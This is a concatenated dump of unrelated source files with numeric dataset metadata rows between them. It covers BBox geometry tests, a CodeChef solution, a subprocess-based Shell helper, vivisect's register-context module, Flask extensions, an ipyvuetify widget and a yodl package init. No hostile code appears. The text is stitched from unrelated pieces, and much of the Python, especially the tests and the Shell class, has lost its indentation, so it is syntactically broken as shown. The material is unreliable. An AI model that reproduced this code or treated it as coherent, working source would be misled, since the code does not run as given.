def testZeroSize3(self):
B = BBox(((5, 10), (5, 10)))
C = BBox(((0, 8), (10, 12)))
assert B.Overlaps(C)
def testZeroSize4(self):
B = BBox(((5, 1), (10, 25)))
C = BBox(((8, 8), (8, 8)))
assert B.Overlaps(C)
class TestEquality():
def testSame(self):
B = BBox(((1.0, 2.0), (5., 10.)))
C = BBox(((1.0, 2.0), (5., 10.)))
assert B == C
def testIdentical(self):
B = BBox(((1.0, 2.0), (5., 10.)))
assert B == B
def testNotSame(self):
B = BBox(((1.0, 2.0), (5., 10.)))
C = BBox(((1.0, 2.0), (5., 10.1)))
assert not B == C
def testWithArray(self):
B = BBox(((1.0, 2.0), (5., 10.)))
C = np.array(((1.0, 2.0), (5., 10.)))
assert B == C
def testWithArray2(self):
B = BBox(((1.0, 2.0), (5., 10.)))
C = np.array(((1.0, 2.0), (5., 10.)))
assert C == B
def testWithArray3(self):
B = BBox(((1.0, 2.0), (5., 10.)))
C = np.array(((1.01, 2.0), (5., 10.)))
assert not C == B
class TestInside():
def testSame(self):
B = BBox(((1.0, 2.0), (5., 10.)))
C = BBox(((1.0, 2.0), (5., 10.)))
assert B.Inside(C)
def testPoint(self):
B = BBox(((1.0, 2.0), (5., 10.)))
C = BBox(((3.0, 4.0), (3.0, 4.0)))
assert B.Inside(C)
def testPointOutside(self):
B = BBox(((1.0, 2.0), (5., 10.)))
C = BBox(((-3.0, 4.0), (0.10, 4.0)))
assert not B.Inside(C)
def testUpperLeft(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((0, 12), (10, 32.0)))
assert not B.Inside(C)
def testUpperRight(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((12, 12), (25, 32.0)))
assert not B.Inside(C)
def testLowerRight(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((12, 5), (25, 15)))
assert not B.Inside(C)
def testLowerLeft(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((-10, 5), (8.5, 15)))
assert not (B.Inside(C))
def testBelow(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((-10, 5), (8.5, 9.2)))
assert not (B.Inside(C))
def testAbove(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((-10, 25.001), (8.5, 32)))
assert not (B.Inside(C))
def testLeft(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((4, 8), (4.95, 32)))
assert not (B.Inside(C))
def testRight(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((17.1, 8), (17.95, 32)))
assert not (B.Inside(C))
class TestPointInside():
def testPointIn(self):
B = BBox(((1.0, 2.0), (5., 10.)))
P = (3.0, 4.0)
assert (B.PointInside(P))
def testUpperLeft(self):
B = BBox(((5, 10), (15, 25)))
P = (4, 30)
assert not (B.PointInside(P))
def testUpperRight(self):
B = BBox(((5, 10), (15, 25)))
P = (16, 30)
assert not (B.PointInside(P))
def testLowerRight(self):
B = BBox(((5, 10), (15, 25)))
P = (16, 4)
assert not (B.PointInside(P))
def testLowerLeft(self):
B = BBox(((5, 10), (15, 25)))
P = (-10, 5)
assert not (B.PointInside(P))
def testBelow(self):
B = BBox(((5, 10), (15, 25)))
P = (10, 5)
assert not (B.PointInside(P))
def testAbove(self):
B = BBox(((5, 10), (15, 25)))
P = (10, 25.001)
assert not (B.PointInside(P))
def testLeft(self):
B = BBox(((5, 10), (15, 25)))
P = (4, 12)
assert not (B.PointInside(P))
def testRight(self):
B = BBox(((5, 10), (15, 25)))
P = (17.1, 12.3)
assert not (B.PointInside(P))
def testPointOnTopLine(self):
B = BBox(((1.0, 2.0), (5., 10.)))
P = (3.0, 10.)
assert (B.PointInside(P))
def testPointLeftTopLine(self):
B = BBox(((1.0, 2.0), (5., 10.)))
P = (-3.0, 10.)
assert not (B.PointInside(P))
def testPointOnBottomLine(self):
B = BBox(((1.0, 2.0), (5., 10.)))
P = (3.0, 5.)
assert (B.PointInside(P))
def testPointOnLeft(self):
B = BBox(((-10., -10.), (-1.0, -1.0)))
P = (-10, -5.)
assert (B.PointInside(P))
def testPointOnRight(self):
B = BBox(((-10., -10.), (-1.0, -1.0)))
P = (-1, -5.)
assert (B.PointInside(P))
def testPointOnBottomRight(self):
B = BBox(((-10., -10.), (-1.0, -1.0)))
P = (-1, -10.)
assert (B.PointInside(P))
class Test_from_points():
def testCreate(self):
Pts = np.array(((5, 2), (3, 4), (1, 6)), np.float64)
B = from_points(Pts)
assert (B[0, 0] == 1.0 and
B[0, 1] == 2.0 and
B[1, 0] == 5.0 and
B[1, 1] == 6.0)
def testCreateInts(self):
Pts = np.array(((5, 2), (3, 4), (1, 6)))
B = from_points(Pts)
assert (B[0, 0] == 1.0 and
B[0, 1] == 2.0 and
B[1, 0] == 5.0 and
B[1, 1] == 6.0)
def testSinglePoint(self):
Pts = np.array((5, 2), np.float_)
B = from_points(Pts)
assert (B[0, 0] == 5. and
B[0, 1] == 2.0 and
B[1, 0] == 5. and
B[1, 1] == 2.0)
def testListTuples(self):
Pts = [(3, 6.5), (13, 43.2), (-4.32, -4), (65, -23), (-0.0001,
23.432)]
B = from_points(Pts)
assert (B[0, 0] == -4.32 and
B[0, 1] == -23.0 and
B[1, 0] == 65.0 and
B[1, 1] == 43.2)
class TestMerge():
A = BBox(((-23.5, 456), (56, 532.0)))
B = BBox(((-20.3, 460), (54, 465))) # B should be completely inside A
C = BBox(((-23.5, 456), (58, 540.))) # up and to the right or A
D = BBox(((-26.5, 12), (56, 532.0)))
def testInside(self):
C = self.A.copy()
C.Merge(self.B)
assert (C == self.A)
def testFullOutside(self):
C = self.B.copy()
C.Merge(self.A)
assert (C == self.A)
def testUpRight(self):
A = self.A.copy()
A.Merge(self.C)
assert (A[0] == self.A[0] and A[1] == self.C[1])
def testDownLeft(self):
A = self.A.copy()
A.Merge(self.D)
assert (A[0] == self.D[0] and A[1] == self.A[1])
class TestWidthHeight():
B = BBox(((1.0, 2.0), (5., 10.)))
def testWidth(self):
assert (self.B.Width == 4.0)
def testWidth2(self):
assert (self.B.Height == 8.0)
def testSetW(self):
with pytest.raises(AttributeError):
self.B.Height = 6
def testSetH(self):
with pytest.raises(AttributeError):
self.B.Width = 6
class TestCenter():
B = BBox(((1.0, 2.0), (5., 10.)))
def testCenter(self):
assert ((self.B.Center == (3.0, 6.0)).all())
def testSetCenter(self):
with pytest.raises(AttributeError):
self.B.Center = (6, 5)
class TestBBarray():
BBarray = np.array((((-23.5, 456), (56, 532.0)), ((-20.3, 460),
(54, 465)), ((-23.5, 456), (58, 540.)), ((-26.5,
12), (56, 532.0))), dtype=np.float)
BB = asBBox(((-26.5, 12.), (58., 540.)))
def testJoin(self):
BB = fromBBArray(self.BBarray)
assert BB == self.BB
class TestNullBBox():
B1 = NullBBox()
B2 = NullBBox()
B3 = BBox(((1.0, 2.0), (5., 10.)))
def testValues(self):
assert (np.alltrue(np.isnan(self.B1)))
def testIsNull(self):
assert (self.B1.IsNull)
def testEquals(self):
assert ((self.B1 == self.B2) is True)
def testNotEquals(self):
assert not self.B1 == self.B3
def testNotEquals2(self):
assert not self.B3 == self.B1
def testMerge(self):
C = self.B1.copy()
C.Merge(self.B3)
assert C == self.B3, 'merge failed, got: %s' % C
def testOverlaps(self):
assert self.B1.Overlaps(self.B3) is False
def testOverlaps2(self):
assert self.B3.Overlaps(self.B1) is False
class TestInfBBox():
B1 = InfBBox()
B2 = InfBBox()
B3 = BBox(((1.0, 2.0), (5., 10.)))
NB = NullBBox()
def testValues(self):
assert (np.alltrue(np.isinf(self.B1)))
# def testIsNull(self):
# assert ( self.B1.IsNull )
def testEquals(self):
assert self.B1 == self.B2
def testNotEquals(self):
assert not self.B1 == self.B3
def testNotEquals2(self):
assert self.B1 != self.B3
def testNotEquals3(self):
assert not self.B3 == self.B1
def testMerge(self):
C = self.B1.copy()
C.Merge(self.B3)
assert C == self.B2, 'merge failed, got: %s' % C
def testMerge2(self):
C = self.B3.copy()
C.Merge(self.B1)
assert C == self.B1, 'merge failed, got: %s' % C
def testOverlaps(self):
assert (self.B1.Overlaps(self.B2) is True)
def testOverlaps2(self):
assert (self.B3.Overlaps(self.B1) is True)
def testOverlaps3(self):
assert (self.B1.Overlaps(self.B3) is True)
def testOverlaps4(self):
assert (self.B1.Overlaps(self.NB) is True)
def testOverlaps5(self):
assert (self.NB.Overlaps(self.B1) is True)
class TestSides():
B = BBox(((1.0, 2.0), (5., 10.)))
def testLeft(self):
assert self.B.Left == 1.0
def testRight(self):
assert self.B.Right == 5.0
def testBottom(self):
assert self.B.Bottom == 2.0
def testTop(self):
assert self.B.Top == 10.0
class TestAsPoly():
B = BBox(((5, 0), (10, 20)))
corners = np.array([(5., 0.), (5., 20.), (10., 20.), (10., 0.)],
dtype=np.float64)
def testCorners(self):
print(self.B.AsPoly())
assert np.array_equal(self.B.AsPoly(), self.corners)
# file: CodeChef/Contest/June Long/pricecon.py (repo: GSri30/Competetive_programming, license: MIT)
test = int(input())
while test > 0 :
n,k = map(int,input().split())
p = list(map(int,input().split()))
original = 0
later = 0
for i in p :
if i > k :
later += k
original += i
else :
later += i
original += i
print(original-later)
    test -= 1
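The loop above totals the original prices and the capped prices, then prints the difference. That difference is just the sum of the per-item overshoots above `k`, so the same answer can be computed in one expression (a sketch, not the submitted solution):

```python
def savings(prices, k):
    # Amount saved when every price above k is reduced to k.
    return sum(p - k for p in prices if p > k)

# savings([10, 2, 30], 5) yields 30 (5 saved on the 10, 25 saved on the 30)
```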
# -*- coding: utf-8 -*-
# file: src/utils/Shell.py (repo: vlab-cs-ucsb/quacky, license: BSD-2-Clause)
"""
Created on Mon Aug 18 22:20:01 2014
@author: baki
"""
import shlex
from subprocess import Popen, PIPE
from .Log import Log
class Shell:
def __init__(self, TAG=""):
self.log = Log(TAG=TAG)
self.current_process = None
self.process_output = None
def setTag(self, tag):
self.log.setTag(tag)
def runcmd(self, cmd, cwd=None, shell=False):
# self.log.v("cmd: {}\n with params: cwd={}, shell={}".format(cmd, cwd, shell))
args = shlex.split(cmd)
p = Popen(args, stdout=PIPE, stderr=PIPE, cwd=cwd, shell=shell)
out, err = p.communicate()
if out:
out = out.decode("ascii")
# self.log.v("cmd output: {}\n".format(out))
if err:
err = err.decode("ascii")
# self.log.v("cmd error: {}\n".format(err))
return out, err
def runcmdBgrnd(self, cmd, out=PIPE, cwd=None, shell=False):
        assert self.current_process is None, "currently, one shell object supports only one background process"
self.log.v("cmd: {}\n with params: out={}, cwd={}, shell={}".format(cmd, out, cwd, shell))
redirect_to = out
if out is not PIPE:
            assert self.process_output is None, "currently, one shell object supports only one background process"
redirect_to = open(out, "w")
args = shlex.split(cmd)
p = Popen(args, stdout=redirect_to, stderr=redirect_to, cwd=cwd, shell=shell)
self.current_process = p
self.process_output = redirect_to
return p
def kill(self, process=None):
if process is None:
process = self.current_process
process and process.kill()
self.process_output and self.process_output.close()
def terminate(self, process=None):
if process is None:
process = self.current_process
process and process.terminate()
self.process_output and self.process_output.close()
def runGrep(self, search, subject, options):
cmd = "grep {} \"{}\" {}".format(options, search, subject)
return self.runcmd(cmd)
def rm(self, name):
cmd = "rm {}".format(name)
return self.runcmd(cmd)
def rmdir(self, name):
cmd = "rmdir {}".format(name)
return self.runcmd(cmd)
def rmrdir(self, name):
cmd = "rm -r {}".format(name)
return self.runcmd(cmd)
def mv(self, src, dst):
cmd = "mv {} {}".format(src, dst)
return self.runcmd(cmd)
def cp(self, src, dst):
cmd = "cp -r {} {}".format(src, dst)
return self.runcmd(cmd)
def mkdir(self, name):
cmd = "mkdir {} -p".format(name)
return self.runcmd(cmd)
def clean(self, name):
self.rmrdir(name)
self.mkdir(name)
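The core of `Shell.runcmd` (shlex-split the command, capture both pipes, decode the bytes from `communicate()`) can be exercised on its own. The sketch below is a minimal, standalone reduction of that pattern without the `Log` dependency; it decodes with the default UTF-8 rather than the module's ASCII, and assumes a POSIX `echo` is available:

```python
import shlex
from subprocess import Popen, PIPE

def runcmd(cmd, cwd=None):
    # Split the command like Shell.runcmd does, capture stdout/stderr,
    # and decode the bytes that communicate() returns.
    args = shlex.split(cmd)
    p = Popen(args, stdout=PIPE, stderr=PIPE, cwd=cwd)
    out, err = p.communicate()
    return out.decode(), err.decode()

out, err = runcmd("echo hello")
```

Note that `Shell.runcmd` passes `shell=shell` while still shlex-splitting the command; with `shell=True` Popen expects a single string, so the split form only behaves as intended with the default `shell=False`.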
| 32.043478 | 119 | 0.557327 | 372 | 2,948 | 4.360215 | 0.236559 | 0.061036 | 0.073366 | 0.081998 | 0.446363 | 0.432799 | 0.405672 | 0.29963 | 0.217016 | 0.161529 | 0 | 0.006394 | 0.31038 | 2,948 | 91 | 120 | 32.395604 | 0.791441 | 0.080393 | 0 | 0.230769 | 0 | 0 | 0.093041 | 0 | 0 | 0 | 0 | 0 | 0.030769 | 1 | 0.215385 | false | 0 | 0.046154 | 0 | 0.415385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c4a64cd498868ef1b6019445d7127a1f346b9fe4 | 13,670 | py | Python | envi/registers.py | ConfusedMoonbear/vivisect | 8d6048037f85f745cd11923c6a8d662c150fe330 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2019-12-11T19:13:59.000Z | 2019-12-11T19:13:59.000Z | envi/registers.py | ConfusedMoonbear/vivisect | 8d6048037f85f745cd11923c6a8d662c150fe330 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | envi/registers.py | ConfusedMoonbear/vivisect | 8d6048037f85f745cd11923c6a8d662c150fe330 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | """
Similar to the memory subsystem, this is a unified way to
access information about objects which contain registers
"""
import envi.bits as e_bits
from envi.const import *
class InvalidRegisterName(Exception):
    pass

class RegisterContext:
    def __init__(self, regdef=(), metas=(), pcindex=None, spindex=None, srindex=None):
        """
        Hand in a register definition which consists of
        a list of (<name>, <width>) tuples.
        """
        self.loadRegDef(regdef)
        self.loadRegMetas(metas)
        self.setRegisterIndexes(pcindex, spindex, srindex=srindex)
        self._rctx_dirty = False

    def getRegisterSnap(self):
        """
        Use this to bulk save off the register state.
        """
        return list(self._rctx_vals)

    def setRegisterSnap(self, snap):
        """
        Use this to bulk restore the register state.

        NOTE: This may only be used under the assumption that the
        RegisterContext has been initialized the same way
        (like context switches in tracers, or emulation snaps)
        """
        self._rctx_vals = list(snap)

    def isDirty(self):
        """
        Returns true if registers in this context have been modified
        since their import.
        """
        return self._rctx_dirty

    def setIsDirty(self, bool):
        self._rctx_dirty = bool

    def setRegisterIndexes(self, pcindex, spindex, srindex=None):
        self._rctx_pcindex = pcindex
        self._rctx_spindex = spindex
        self._rctx_srindex = srindex

    def loadRegDef(self, regdef, defval=0):
        """
        Load a register definition. A register definition consists
        of a list of tuples with the following format:
        (regname, regwidth)

        NOTE: All widths in envi RegisterContexts are in bits.
        """
        self._rctx_regdef = regdef  # Save this for snaps etc..
        self._rctx_names = {}
        self._rctx_ids = {}
        self._rctx_widths = []
        self._rctx_vals = []
        self._rctx_masks = []
        for i, (name, width) in enumerate(regdef):
            self._rctx_names[name] = i
            self._rctx_ids[i] = name
            self._rctx_widths.append(width)
            self._rctx_masks.append((2**width)-1)
            self._rctx_vals.append(defval)

    def getRegDef(self):
        return self._rctx_regdef

    def loadRegMetas(self, metas, statmetas=None):
        """
        Load a set of defined "meta" registers for this architecture. Meta
        registers are defined as registers which exist as a subset of the bits
        in some other "real" register. The argument metas is a list of tuples
        with the following format:
        (regname, regidx, reg_shift_offset, reg_width)
        The given example is for the AX register in the i386 subsystem
        regname: "ax"
        reg_shift_offset: 0
        reg_width: 16

        Optionally a set of status meta registers can be loaded as well.
        The argument is a list of tuples with the following format:
        (regname, regidx, reg_shift_offset, reg_width, description)
        """
        self._rctx_regmetas = metas
        for name, idx, offset, width in metas:
            self.addMetaRegister(name, idx, offset, width)
        self._rctx_statmetas = statmetas

    def addMetaRegister(self, name, idx, offset, width):
        """
        Meta registers are registers which are really just directly
        addressable parts of already existing registers (eax -> al).

        To add a meta register, you give the name, the idx of the *real*
        register, the width of the meta reg, and its left-shifted (in bits)
        offset into the real register value. The RegisterContext will take
        care of accesses after that.
        """
        newidx = (offset << 24) + (width << 16) + idx
        self._rctx_names[name] = newidx
        self._rctx_ids[newidx] = name

    def isMetaRegister(self, index):
        return (index & 0xffff) != index

    def _rctx_Import(self, sobj):
        """
        Given an object with attributes with the same names as
        registers in our context, populate our values from it.

        NOTE: This also clears the dirty flag
        """
        # On import from a structure, we are clean again.
        self._rctx_dirty = False
        for name, idx in self._rctx_names.items():
            # Skip meta registers
            if (idx & 0xffff) != idx:
                continue
            x = getattr(sobj, name, None)
            if x is not None:
                self._rctx_vals[idx] = x

    def _rctx_Export(self, sobj):
        """
        Given an object with attributes with the same names as
        registers in our context, set the ones it has to match
        our values.
        """
        for name, idx in self._rctx_names.items():
            # Skip meta registers
            if (idx & 0xffff) != idx:
                continue
            if hasattr(sobj, name):
                setattr(sobj, name, self._rctx_vals[idx])

    def getRegisterInfo(self, meta=False):
        """
        Return an object which can be stored off, and restored
        to re-initialize a register context. (much like snapshot
        but it takes the definitions with it)
        """
        regdef = self._rctx_regdef
        regmeta = self._rctx_regmetas
        pcindex = self._rctx_pcindex
        spindex = self._rctx_spindex
        snap = self.getRegisterSnap()
        return (regdef, regmeta, pcindex, spindex, snap)

    def setRegisterInfo(self, info):
        regdef, regmeta, pcindex, spindex, snap = info
        self.loadRegDef(regdef)
        self.loadRegMetas(regmeta)
        self.setRegisterIndexes(pcindex, spindex)
        self.setRegisterSnap(snap)

    def getRegisterName(self, index):
        return self._rctx_ids.get(index, "REG%.8x" % index)

    def getProgramCounter(self):
        """
        Get the value of the program counter for this register context.
        """
        return self.getRegister(self._rctx_pcindex)

    def setProgramCounter(self, value):
        """
        Set the value of the program counter for this register context.
        """
        self.setRegister(self._rctx_pcindex, value)

    def getStackCounter(self):
        return self.getRegister(self._rctx_spindex)

    def setStackCounter(self, value):
        self.setRegister(self._rctx_spindex, value)

    def hasStatusRegister(self):
        '''
        Returns True if this context is aware of a status register.
        '''
        return self._rctx_srindex is not None

    def getStatusRegNameDesc(self):
        '''
        Return a list of status register names and descriptions.
        '''
        return [(name, desc) for name, idx, offset, width, desc in self._rctx_statmetas]

    def getStatusRegister(self):
        '''
        Gets the status register for this register context.
        '''
        return self.getRegister(self._rctx_srindex)

    def setStatusRegister(self, value):
        '''
        Sets the status register for this register context.
        '''
        self.setRegister(self._rctx_srindex, value)

    def getStatusFlags(self):
        '''
        Return a dictionary of reg name and reg value for the meta registers
        that are part of the status register.
        '''
        ret = {}
        for name, idx, offset, width, desc in self._rctx_statmetas:
            ret[name] = self.getRegisterByName(name)
        return ret

    def getRegisterByName(self, name):
        idx = self._rctx_names.get(name)
        if idx is None:
            raise InvalidRegisterName("Unknown Register: %s" % name)
        return self.getRegister(idx)

    def setRegisterByName(self, name, value):
        idx = self._rctx_names.get(name)
        if idx is None:
            raise InvalidRegisterName("Unknown Register: %s" % name)
        self.setRegister(idx, value)

    def getRegisterNames(self):
        '''
        Returns a list of the 'real' (non meta) registers.
        '''
        regs = [rname for rname, ridx in self._rctx_names.items()
                if not self.isMetaRegister(ridx)]
        return regs

    def getRegisterNameIndexes(self):
        '''
        Return a list of all the 'real' (non meta) registers and their indexes.

        Example: for regname, regidx in x.getRegisterNameIndexes():
        '''
        regs = [(rname, ridx) for rname, ridx in self._rctx_names.items()
                if not self.isMetaRegister(ridx)]
        return regs

    def getRegisters(self):
        """
        Get all the *real* registers from this context as a dictionary of name
        value pairs.
        """
        ret = {}
        for name, idx in self._rctx_names.items():
            if (idx & 0xffff) != idx:
                continue
            ret[name] = self.getRegister(idx)
        return ret

    def setRegisters(self, regdict):
        """
        For any name value pairs in the specified dictionary, set the current
        register values in this context.
        """
        for name, value in regdict.items():
            self.setRegisterByName(name, value)

    def getRegisterIndex(self, name):
        """
        Get a register index by name.
        (faster to use the index multiple times)
        """
        return self._rctx_names.get(name)

    def getRegisterWidth(self, index):
        """
        Return the width of the register which lives at the specified
        index (width is always in bits).
        """
        ridx = index & 0xffff
        if ridx == index:
            return self._rctx_widths[index]
        width = (index >> 16) & 0xff
        return width

    def getRegister(self, index):
        """
        Return the current value of the specified register index.
        """
        ridx = index & 0xffff
        value = self._rctx_vals[ridx]
        if ridx != index:
            value = self._xlateToMetaReg(index, value)
        return value

    def getMetaRegInfo(self, index):
        '''
        Return the appropriate realreg, shift, mask info
        for the specified metareg idx (or None if it's not
        meta).

        Example:
            real_reg, lshift, mask = r.getMetaRegInfo(x)
        '''
        ridx = index & 0xffff
        if ridx == index:
            return None
        offset = (index >> 24) & 0xff
        width = (index >> 16) & 0xff
        mask = (2**width)-1
        return ridx, offset, mask

    def _xlateToMetaReg(self, index, value):
        '''
        Translate a register value to the meta register value
        (used when getting a meta register)
        '''
        ridx = index & 0xffff
        offset = (index >> 24) & 0xff
        width = (index >> 16) & 0xff
        mask = (2**width)-1
        if offset != 0:
            value >>= offset
        return value & mask

    def _xlateToNativeReg(self, index, value):
        '''
        Translate a register value to the native register value
        (used when setting a meta register)
        '''
        ridx = index & 0xffff
        width = (index >> 16) & 0xff
        offset = (index >> 24) & 0xff
        # FIXME is it faster to generate or look these up?
        mask = (2 ** width) - 1
        mask = mask << offset
        # NOTE: basewidth is in *bits*
        basewidth = self._rctx_widths[ridx]
        basemask = (2 ** basewidth) - 1
        # cut a hole in basemask at the size/offset of mask
        finalmask = basemask ^ mask
        curval = self._rctx_vals[ridx]
        if offset:
            value <<= offset
        return value | (curval & finalmask)

    def setRegister(self, index, value):
        """
        Set a register value by index.
        """
        self._rctx_dirty = True
        ridx = index & 0xffff
        # If it's a meta register index, lets mask it into
        # the real thing...
        if ridx != index:
            value = self._xlateToNativeReg(index, value)
        self._rctx_vals[ridx] = (value & self._rctx_masks[ridx])

    def getRealRegisterNameByIdx(self, regidx):
        """
        Returns the name of the containing register (in the case
        of meta-registers) or the name of the register.
        (by index)
        """
        return self.getRegisterName(regidx & RMETA_NMASK)

    def getRealRegisterName(self, regname):
        """
        Returns the name of the containing register (in the case
        of meta-registers) or the name of the register.
        """
        ridx = self.getRegisterIndex(regname)
        if ridx is not None:
            return self.getRegisterName(ridx & RMETA_NMASK)
        return regname

def addLocalEnums(l, regdef):
    """
    Update a dictionary (or module locals) with REG_FOO index
    values for all the base registers defined in regdef.
    """
    for i, (rname, width) in enumerate(regdef):
        l["REG_%s" % rname.upper()] = i

def addLocalStatusMetas(l, metas, statmetas, regname):
    '''
    Dynamically create data based on the status register meta register
    definition.

    Adds new meta registers and bitmask constants.
    '''
    for metaname, idx, offset, width, desc in statmetas:
        # create meta registers
        metas.append((metaname, idx, offset, width))
        # create local bitmask constants (EFLAGS_%)
        l['%s_%s' % (regname, metaname)] = 1 << offset  # TODO: fix for arbitrary width

def addLocalMetas(l, metas):
    """
    Update a dictionary (or module locals) with REG_FOO index
    values for all meta registers defined in metas.
    """
    for name, idx, offset, width in metas:
        l["REG_%s" % name.upper()] = (offset << 24) | (width << 16) | idx
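The meta-register index packed by `addMetaRegister` is simply `(offset << 24) | (width << 16) | idx`, and reads go through the same shift-and-mask that `_xlateToMetaReg` applies. The sketch below is a standalone illustration of that encoding (hypothetical `REG_*` names, not part of the module):

```python
def pack_meta(idx, offset, width):
    # Same layout addMetaRegister uses: offset in bits 24+, width in
    # bits 16..23, and the real register index in the low 16 bits.
    return (offset << 24) | (width << 16) | idx

def xlate_to_meta(index, value):
    # Mirror of _xlateToMetaReg: shift down, then mask to the meta width.
    offset = (index >> 24) & 0xff
    width = (index >> 16) & 0xff
    return (value >> offset) & ((2 ** width) - 1)

REG_EAX = 0
REG_AX = pack_meta(REG_EAX, 0, 16)   # low 16 bits of eax
REG_AH = pack_meta(REG_EAX, 8, 8)    # bits 8..15 of eax
```

Masking a meta index with `0xffff` recovers the real register index, which is exactly how `getRegister` decides whether translation is needed.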
| 31.643519 | 88 | 0.59744 | 1,620 | 13,670 | 4.953086 | 0.201235 | 0.055833 | 0.017822 | 0.01346 | 0.2834 | 0.225324 | 0.218096 | 0.205882 | 0.185444 | 0.159771 | 0 | 0.006314 | 0.316459 | 13,670 | 431 | 89 | 31.716937 | 0.852419 | 0.327944 | 0 | 0.252577 | 0 | 0 | 0.007943 | 0 | 0 | 0 | 0.010922 | 0.00464 | 0 | 1 | 0.221649 | false | 0.005155 | 0.015464 | 0.020619 | 0.391753 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c4a6ac024777e5d5757393235c2f8a34ef55a681 | 531 | py | Python | services/nris-api/backend/app/extensions.py | parc-jason/mds | 8f181a429442208a061ed72065b71e6c2bd0f76f | [
"Apache-2.0"
] | null | null | null | services/nris-api/backend/app/extensions.py | parc-jason/mds | 8f181a429442208a061ed72065b71e6c2bd0f76f | [
"Apache-2.0"
] | null | null | null | services/nris-api/backend/app/extensions.py | parc-jason/mds | 8f181a429442208a061ed72065b71e6c2bd0f76f | [
"Apache-2.0"
] | null | null | null |
from flask_caching import Cache
from flask_jwt_oidc import JwtManager
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate, MigrateCommand
from flask import current_app
from elasticapm.contrib.flask import ElasticAPM
from .config import Config
from .helper import Api
apm = ElasticAPM()
db = SQLAlchemy()
migrate = Migrate()
jwt = JwtManager()
cache = Cache()
api = Api(
    prefix=f'{Config.BASE_PATH}',
    doc=f'{Config.BASE_PATH}/',
    default='nris_api',
    default_label='NRIS related operations')
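These module-level singletons (`db`, `cache`, `apm`, `jwt`) follow Flask's deferred-initialization pattern: each extension is constructed unbound at import time and attached to the application later via `init_app`, typically inside an app factory. A minimal standalone sketch of that pattern (hypothetical names, no Flask dependency):

```python
class Extension:
    """Stands in for SQLAlchemy/Cache/etc.: constructed unbound, bound later."""
    def __init__(self):
        self.app = None

    def init_app(self, app):
        # Called once the application object exists (app-factory time).
        self.app = app

db = Extension()   # module import time: no app exists yet

class App:
    pass

app = App()
db.init_app(app)   # factory time: extension bound to the concrete app
```

This is why extension modules like this one can be imported freely by blueprints without creating circular imports on the application object.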
| 23.086957 | 49 | 0.770245 | 71 | 531 | 5.619718 | 0.422535 | 0.112782 | 0.055138 | 0.075188 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145009 | 531 | 22 | 50 | 24.136364 | 0.878855 | 0 | 0 | 0 | 0 | 0 | 0.128302 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.444444 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
c4ad9991f367ca79cfc5f643798ad08df02746df | 905 | py | Python | pylbm_ui/widgets/message.py | pylbm/pylbm_ui | 0a7202ee6ee5424486ce6ade1d3b18d8139d4ffb | [
"BSD-3-Clause"
] | 3 | 2021-05-17T20:38:32.000Z | 2021-11-16T17:54:26.000Z | pylbm_ui/widgets/message.py | pylbm/pylbm_ui | 0a7202ee6ee5424486ce6ade1d3b18d8139d4ffb | [
"BSD-3-Clause"
] | 32 | 2021-04-29T13:27:13.000Z | 2021-07-01T07:22:58.000Z | pylbm_ui/widgets/message.py | pylbm/pylbm_ui | 0a7202ee6ee5424486ce6ade1d3b18d8139d4ffb | [
"BSD-3-Clause"
] | 1 | 2021-04-30T06:40:21.000Z | 2021-04-30T06:40:21.000Z | import ipyvuetify as v
class Message(v.Container):
    def __init__(self, message):
        self.message = v.Alert(
            children=[f'{message}...'],
            class_='primary--text'
        )

        super().__init__(
            children=[
                v.Row(
                    children=[
                        v.ProgressCircular(
                            indeterminate=True,
                            color='primary',
                            size=70,
                            width=4
                        )
                    ],
                    justify='center'
                ),
                v.Row(
                    children=[
                        self.message,
                    ],
                    justify='center'
                )
            ]
        )

    def update(self, new_message):
        self.message.children = [f'{new_message}...']
c4b3b6d76efc3c8c72713052f1e8b243b1695f31 | 265 | py | Python | yodl/__init__.py | brunolange/yodl | d9e957cacf1391fce3dfe9ac24e4fb434d14d8b0 | [
"MIT"
] | null | null | null | yodl/__init__.py | brunolange/yodl | d9e957cacf1391fce3dfe9ac24e4fb434d14d8b0 | [
"MIT"
] | null | null | null | yodl/__init__.py | brunolange/yodl | d9e957cacf1391fce3dfe9ac24e4fb434d14d8b0 | [
"MIT"
] | null | null | null | """yodl!
yodl provides a class decorator to build django models
from YAML configuration files
"""
from .decorators import yodl
from .io import yodlify
__author__ = "Bruno Lange"
__email__ = "blangeram@gmail.com"
__license__ = "MIT"
__all__ = ["yodl", "yodlify"]
